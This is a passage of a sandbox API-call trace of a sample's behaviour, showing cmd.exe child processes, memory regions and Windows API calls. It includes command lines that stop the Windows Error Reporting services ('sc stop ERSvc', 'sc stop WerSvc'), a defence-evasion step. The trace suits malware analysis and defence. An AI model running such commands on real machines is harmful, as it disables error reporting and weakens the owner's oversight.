[0021.450] InitializeProcThreadAttributeList (in: lpAttributeList=0x36f2c4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x36f38c | out: lpAttributeList=0x36f2c4, lpSize=0x36f38c) returned 1 [0021.450] UpdateProcThreadAttribute (in: lpAttributeList=0x36f2c4, dwFlags=0x0, Attribute=0x60001, lpValue=0x36f384, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x36f2c4, lpPreviousValue=0x0) returned 1 [0021.450] GetStartupInfoW (in: lpStartupInfo=0x36f280 | out: lpStartupInfo=0x36f280*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0021.450] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0021.451] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0021.451] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0021.451] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0021.451] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0021.451] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0021.451] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0021.451] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0021.451] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0021.451] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0021.452] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop ERSvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x36f320*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop ERSvc", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36f36c | out: lpCommandLine="sc stop ERSvc", lpProcessInformation=0x36f36c*(hProcess=0x78, hThread=0x74, dwProcessId=0xb34, dwThreadId=0xb38)) returned 1 [0021.539] CloseHandle (hObject=0x74) returned 1 [0021.539] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0021.539] GetEnvironmentStringsW () returned 0x3a5ee0* [0021.539] FreeEnvironmentStringsW (penv=0x3a5ee0) returned 1 [0021.539] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0021.865] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x36f260 | out: lpExitCode=0x36f260*=0x424) returned 1 [0021.865] CloseHandle (hObject=0x78) returned 1 [0021.865] _vsnwprintf (in: _Buffer=0x36f3a8, _BufferCount=0x13, _Format="%08X", _ArgList=0x36f26c | out: _Buffer="00000424") returned 8 [0021.865] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0021.865] GetEnvironmentStringsW () returned 0x3a40a0* [0021.865] FreeEnvironmentStringsW (penv=0x3a40a0) returned 1 [0021.865] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0021.865] GetEnvironmentStringsW () returned 0x3a40a0* [0021.866] FreeEnvironmentStringsW (penv=0x3a40a0) returned 1 [0021.866] DeleteProcThreadAttributeList (in: lpAttributeList=0x36f2c4 | out: lpAttributeList=0x36f2c4) [0021.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.866] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.866] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.866] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.866] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.866] SetConsoleInputExeNameW () returned 0x1 [0021.866] GetConsoleOutputCP () returned 0x1b5 [0021.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.866] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.867] exit (_Code=1060) Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6458c000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C sc stop WerSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 501 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 502 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 503 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 504 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 505 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 506 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 507 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 508 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 509 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 510 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 511 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 512 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 513 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 514 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 515 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 516 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 517 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 518 start_va = 0x520000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 519 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 520 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 521 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 800 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 801 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 802 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 803 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 804 start_va = 0x780000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 805 start_va = 0x74c80000 end_va = 0x74c86fff entry_point = 0x74c81230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 806 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 807 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 808 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 809 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 810 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 811 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 812 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 813 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 814 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 815 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 816 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 817 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 818 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 819 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 820 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 821 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 971 start_va = 0x340000 end_va = 0x4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 972 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 973 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 974 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 975 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 976 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 977 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 978 start_va = 0x5a0000 end_va = 0x720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 979 start_va = 0x880000 end_va = 0x1c7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 980 start_va = 0x1c80000 end_va = 0x1fc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 981 start_va = 0x1fd0000 end_va = 0x229efff entry_point = 0x1fd0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 29 os_tid = 0xaac [0021.536] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33f834 | out: lpSystemTimeAsFileTime=0x33f834*(dwLowDateTime=0x14706860, dwHighDateTime=0x1d35d7b)) [0021.536] GetCurrentProcessId () returned 0xaa8 [0021.536] GetCurrentThreadId () returned 0xaac [0021.536] GetTickCount () returned 0x14816 [0021.536] QueryPerformanceCounter (in: lpPerformanceCount=0x33f82c | out: lpPerformanceCount=0x33f82c*=325221828) returned 1 [0021.538] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0021.538] __set_app_type (_Type=0x1) [0021.538] __p__fmode () returned 0x76d831f4 [0021.538] __p__commode () returned 0x76d831fc [0021.538] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0021.538] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0021.538] GetCurrentThreadId () returned 0xaac [0021.538] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaac) returned 0x60 [0021.538] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0021.538] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0021.539] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.542] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.542] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x33f7c4 | out: phkResult=0x33f7c4*=0x0) returned 0x2 [0021.542] VirtualQuery (in: lpAddress=0x33f7fb, lpBuffer=0x33f794, dwLength=0x1c | out: lpBuffer=0x33f794*(BaseAddress=0x33f000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0021.542] VirtualQuery (in: lpAddress=0x240000, lpBuffer=0x33f794, dwLength=0x1c | out: lpBuffer=0x33f794*(BaseAddress=0x240000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0021.542] VirtualQuery (in: lpAddress=0x241000, lpBuffer=0x33f794, dwLength=0x1c | out: lpBuffer=0x33f794*(BaseAddress=0x241000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0021.542] VirtualQuery (in: lpAddress=0x243000, lpBuffer=0x33f794, dwLength=0x1c | out: lpBuffer=0x33f794*(BaseAddress=0x243000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0021.542] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x33f794, dwLength=0x1c | out: lpBuffer=0x33f794*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0021.542] GetConsoleOutputCP () returned 0x1b5 [0021.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.543] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0021.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.543] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0021.544] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.544] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.544] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.544] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.544] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.544] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.544] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.544] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0021.544] GetEnvironmentStringsW () returned 0x792018* [0021.545] FreeEnvironmentStringsW (penv=0x792018) returned 1 [0021.545] GetEnvironmentStringsW () returned 0x792018* [0021.545] FreeEnvironmentStringsW (penv=0x792018) returned 1 [0021.545] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33e734 | out: phkResult=0x33e734*=0x68) returned 0x0 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x0, lpData=0x33e740*=0x0, lpcbData=0x33e738*=0x1000) returned 0x2 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x4, lpData=0x33e740*=0x1, lpcbData=0x33e738*=0x4) returned 0x0 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x0, lpData=0x33e740*=0x1, lpcbData=0x33e738*=0x1000) returned 0x2 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x4, lpData=0x33e740*=0x0, lpcbData=0x33e738*=0x4) returned 0x0 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x4, lpData=0x33e740*=0x40, lpcbData=0x33e738*=0x4) returned 0x0 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x4, lpData=0x33e740*=0x40, lpcbData=0x33e738*=0x4) returned 0x0 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x0, lpData=0x33e740*=0x40, lpcbData=0x33e738*=0x1000) returned 0x2 [0021.545] RegCloseKey (hKey=0x68) returned 0x0 [0021.545] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33e734 | out: phkResult=0x33e734*=0x68) returned 0x0 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x0, lpData=0x33e740*=0x40, lpcbData=0x33e738*=0x1000) returned 0x2 [0021.545] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x4, lpData=0x33e740*=0x1, lpcbData=0x33e738*=0x4) returned 0x0 [0021.546] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x0, lpData=0x33e740*=0x1, lpcbData=0x33e738*=0x1000) returned 0x2 [0021.546] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x4, lpData=0x33e740*=0x0, lpcbData=0x33e738*=0x4) returned 0x0 [0021.546] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x4, lpData=0x33e740*=0x9, lpcbData=0x33e738*=0x4) returned 0x0 [0021.546] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x4, lpData=0x33e740*=0x9, lpcbData=0x33e738*=0x4) returned 0x0 [0021.546] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33e73c, lpData=0x33e740, lpcbData=0x33e738*=0x1000 | out: lpType=0x33e73c*=0x0, lpData=0x33e740*=0x9, lpcbData=0x33e738*=0x1000) returned 0x2 [0021.546] RegCloseKey (hKey=0x68) returned 0x0 [0021.546] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db4 [0021.546] srand (_Seed=0x5a0b3db4) [0021.546] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop WerSvc" [0021.546] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop WerSvc" [0021.546] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.546] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x792020, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0021.546] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0021.546] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0021.546] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0021.546] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0021.546] _wcsicmp (_String1="PROMPT", 